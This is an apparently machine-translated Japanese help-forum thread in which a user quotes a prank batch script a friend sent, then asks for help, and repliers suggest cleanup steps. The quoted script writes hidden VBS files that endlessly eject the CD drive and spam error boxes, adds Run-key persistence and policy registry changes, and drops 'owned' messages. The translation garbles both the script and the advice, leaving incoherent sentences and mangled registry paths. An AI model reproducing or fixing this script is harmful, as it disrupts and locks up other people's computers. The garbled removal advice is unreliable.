私は悪意のあるスクリプトを実行しました、そして今私のPCは問題を抱えています
こんにちは,私はこれを送りました
@echo
echoセットOWMP= CreateObject( "wmplayer.ocx.7")>>123.vbs
echoセットCOLCDROMS= OWMP.CDROMCollection>>123.vbs
echo do>>123.vbs
colcdroms.count>= 1>>123.vbs
i= 0からcolcdroms.count-1のためのecho-1>>123.vbs
echo colcdroms.item(i).関数>>123.vbs
echo next>>123.vbs
i= 0からcolcdroms.count-1のためのecho-1>>123.vbs
echo colcdroms.item(i).関数>>123.vbs
echo next>>123.vbs
echoエンドIF>>123.vbs
wscript.sleep 5000>>123.vbs
echoループ>>123.vbs
echo do>>1234.vbs
echoMSGBOX「ねじ込まれています」、64、「err0r」>>1234.vbs
echoループ>>1234.vbs
コピー/y 123.vbs c:\
コピー/y 1234.vbs c:\
attrib + S + H C:\123.vbs
attrib + s + H C:\1234.vbs
REG HKEY_CURRENT_USER\SOFjpARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\/V NoClose/T Reg_Dword/F/D 1
REG HKEY_LOCAL_MACHINE\SOFjpARE\Microsoft\Windows\CurrentVersion\Policies\System\/V LegalNoticeText/F/D "YOR"
reg hkey_local_machine\software\Microsoft\Windows\CurrentVersion\Policies\System\/V LegalNoticeCaption/f/d "b0zz_err0r"
REG HKEY_LOCAL_MACHINE\SOFjpARE\Microsoft\Windows\CurrentVersion\Run/V 123.vbs/D C:\123.vbs
REG HKEY_LOCAL_MACHINE\SOFjpARE\Microsoft\Windows\CurrentVersion\Run/V 1234.vbs/D C:\1234.vbs
attrib + S + H C:\123.vbs
attrib + s + H C:\1234.vbs
Start 123.vbs
Start 1234.vbs
echoコードSmahserはあなたのコンピュータを所有しています!>>C:\almasmalik.txt
echoコードSmahserはあなたのコンピュータを所有しています!>>D:\almasmalik.txt
echoコードSmahserはあなたのコンピュータを所有しています!>>e:\almasmalik.txt
MSG*あなたのコンピュータ「安心して休む」
そして友人はそれをバッチファイルとしてそれを開き、それを開いたので、私のCD/ROMはオープニングとクローズを続けています...エラーMSGはポップアップし続け、私のPCの電源を入れるとエラーMSGが表示されるので、OKを押す必要があります私のアカウント
私を助けてください、それを削除しようとしましたが、私はそれが私の信頼できるものを完了しなければならないと言うことができないと言うことができませんでした.
私は何をすべきか?
[元のタイトル:私を助けてください]
返信リスト(回答:4)
あなたはいい友達がいます.
もちろんタスクマネージャを使用してタスクを終了するのは常にオプションです.Ctrl + Alt + Delを開くには.
あるいは、Safe Mode Windows Logo Key + Rに入ってMSCONFIG.EXEを入力して「診断起動」を選択して、そこからこれを取り除き、そこからサイバーで与えられたヒントを使用してください.
完了したらMSCONFIGを再度開き、「通常の起動」
を選択してください.しかし、最速の方法は通常ファクトリリセット
です.
[Settings]と入力して[Setting]windows に入力し、[このPCをリセットする]をクリックすると、[すべてを削除]を選択してから、[すべてを削除]を選択してから、ディスクまたはUSBフラッシュドライバまたはUSBフラッシュドライバを介してオリジナルのversionのWindowsを再インストールします.Plain
応答1# ->にスキップ4 #Cyberリセットを実行すると、インストールされているすべてのプログラムがアンインストールされ、それらを再インストールする必要があることに注意してください.したがって、リセットせずに問題を修正することをお勧めします.これ以上オプションがない場合は、リセットを検討できます.しかし、私はあなたの問題が
リセットせずに解決できます.
次回、特にスクリプトの場合は、次回は疑わしいファイルを開いていないだけで削除するだけです.
あなたはそれらを提出することができます https://www.virustotal.com/
不明または信頼できないソースからファイルを開くべきではありません.echoパーツはそれほど重要ではありませんが、それらが表示されているのであれば、コマンドプロンプトの終了タスクを試してみてください.
問題は、レジストリを追加してファイルをコピーする場所のような他の部分についてリレーを中継します.
隠しファイルとシステムの隠しファイルを表示してC:ドライバを参照してから、すべての.vbsファイルを見つけて、そのフォルダにコピーしてそのフォルダをzipにコピーしてサンプルとしてマークしてください.システムの復元を使用して、この問題がレジストリのライドを受信しようとした前に復元することができます.
そうでない場合は、レジストリをバックアップし、レジストリが追加された場所を訪問します.
HKEY_CURRENT_USER\SOFjpARE¥Microsoft¥Windows¥CurrentVersion¥Policies¥Explorer¥/vinoclose/t reg_dword
ポリシーを削除して、削除コマンドを使用してコマンドを使用することができます.
Reg Delete
REG DELETE
そのため、追加されたすべてのレジストリを削除し、.vbsファイルのサンプルを取り、それらを削除して、初期の問題を解決するのに役立ちます.